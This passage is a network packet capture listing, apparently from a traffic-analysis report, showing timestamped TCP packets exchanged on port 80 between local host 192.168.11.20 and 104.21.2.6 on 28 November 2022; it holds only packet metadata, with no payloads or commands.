                                                                    Nov 28, 2022 16:37:04.359124899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.359148026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.359163046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.359175920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.359188080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.359200954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.359211922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.359221935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.359256029 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.359453917 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.359596968 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.368860960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369009018 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.369169950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369196892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369216919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369235992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369252920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369263887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369275093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369285107 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369296074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369306087 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369317055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369327068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369338036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369349003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369359016 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.369369984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369379997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369390965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369401932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369412899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369424105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369435072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369446039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369456053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369474888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369488955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369499922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369510889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369522095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369539976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369560003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369577885 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.369577885 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.369592905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369606972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369618893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369631052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369646072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369669914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369685888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369698048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369709969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369720936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369746923 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.369838953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369852066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369863987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369875908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369887114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369899035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369910002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369918108 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.369930029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369947910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369961977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369972944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.369985104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370002985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370023966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370042086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370055914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370068073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370079994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370083094 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.370083094 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.370099068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370110989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370121956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370132923 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370143890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370156050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370167971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370250940 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.370373011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370384932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370397091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370409012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370423079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370434999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370446920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370459080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370470047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370481968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370493889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370505095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370517015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370528936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370539904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370552063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370563984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370574951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370587111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370589018 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.370603085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370632887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370644093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.370763063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.370763063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.370919943 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.378580093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.378720045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.378870964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.378900051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.378921032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.378943920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.378967047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.378988981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379008055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379029989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379050016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379060030 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.379081011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379095078 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379107952 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379110098 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.379125118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379136086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379148006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379159927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379170895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379183054 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379194975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379205942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379218102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379230022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379259109 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379271984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379276991 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.379300117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379312992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379323959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379336119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379348040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379359007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379370928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379384041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379400969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.379451036 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.379451036 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.379625082 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.385356903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385546923 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.385668039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385683060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385695934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385708094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385720015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385732889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385751963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385771990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385791063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385804892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385817051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385828972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385839939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385852098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385854959 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.385870934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385883093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385895014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385902882 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.385911942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385924101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385935068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385946989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385958910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385970116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385982037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.385992050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386003971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386075974 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.386099100 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386111975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386123896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386135101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386147022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386157990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386169910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386181116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386193037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386204004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386215925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386228085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386239052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386243105 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.386243105 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.386259079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386276960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386297941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386317015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386329889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386342049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386353970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386365891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386377096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386389017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386399984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386410952 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386415958 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.386430979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386440992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.386600971 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.391856909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.391979933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.391994953 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.392014980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.392035007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.392080069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.392103910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.392229080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.392246008 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.392246008 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.392246008 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.392246008 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.392275095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.392301083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.392327070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.392463923 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.392463923 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.392632961 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.397417068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397531986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397546053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397564888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397577047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397588015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397598982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397627115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397634029 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.397639036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397680998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397691965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397702932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397720098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397735119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397747040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397758007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397769928 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.397775888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397789001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397799969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397809982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397828102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397841930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397851944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397862911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397881985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397892952 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397902966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397913933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397931099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397938013 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.397938013 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.397944927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397955894 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397967100 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.397984982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398000956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398011923 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398022890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398041964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398053885 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398081064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398097038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398108959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398113012 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.398119926 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398132086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398143053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398154020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398164988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.398277998 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.398340940 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.404690027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404802084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404817104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404835939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404848099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404859066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404870033 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404886007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404897928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.404908895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405049086 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.405057907 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405071974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405090094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405102968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405113935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405124903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405143976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405157089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405168056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405180931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405195951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405205965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405216932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405220985 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.405227900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405236959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.405391932 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.405391932 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.405875921 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.410032034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410046101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410058022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410089970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410101891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410113096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410129070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410140038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410151005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410243988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410258055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410274982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410286903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410298109 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410309076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.410319090 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.410319090 CET4983080192.168.11.20104.21.2.6
